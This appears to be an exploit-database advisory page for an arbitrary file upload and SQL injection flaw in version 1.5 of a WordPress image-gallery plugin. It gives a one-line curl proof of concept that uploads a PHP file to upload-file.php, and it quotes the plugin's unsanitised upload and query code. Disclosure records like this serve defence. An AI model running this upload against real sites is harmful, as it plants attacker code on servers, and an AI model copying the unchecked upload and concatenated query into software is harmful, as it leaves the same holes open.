header-logo
Suggest Exploit
vendor:
Image-Gallery-With-Slideshow
by:
Hrvoje Spoljar
9.3
CVSS
HIGH
Arbitrary File Upload / SQL Injection
89
CWE
Product Name: Image-Gallery-With-Slideshow
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: /a:wordpress:wordpress:image-gallery-with-slideshow
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

WordPress image-gallery-with-slideshow plugin <= 1.5 Arbitrary file upload / SQL injection

The Wordpress image-gallery-with-slideshow plugin version 1.5 is vulnerable to arbitrary file upload and SQL injection. An attacker can exploit this vulnerability by sending a malicious file to the upload-file.php script, which is then uploaded to the server and stored in the database. The attacker can then use the SQL injection vulnerability to execute arbitrary SQL commands on the database.

Mitigation:

Upgrade to the latest version of the plugin.
Source

Exploit-DB raw data:

Title: Wordpress image-gallery-with-slideshow plugin <= 1.5 Arbitrary file
upload / SQL injection
Version:1.5
Date: 30-8-2011
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
Software link:
http://wordpress.org/extend/plugins/image-gallery-with-slideshow/

PoC:
curl -F "uploadfile=@mycode.php"
http://domain.tld/wp-content/plugins/image-gallery-with-slideshow/upload-file.php

File(s):upload-file.php
Code:
$new_image =time()."_".$_FILES['uploadfile']['name'];
$original_image = $_FILES['uploadfile']['name'];
...
$value_org = move_uploaded_file($_FILES['uploadfile']['tmp_name'],
$file_original);
$insert_query = "INSERT INTO `".$table_prefix."combo_image`
VALUES('','0','".$new_image."','".$original_image."','','','',NOW())";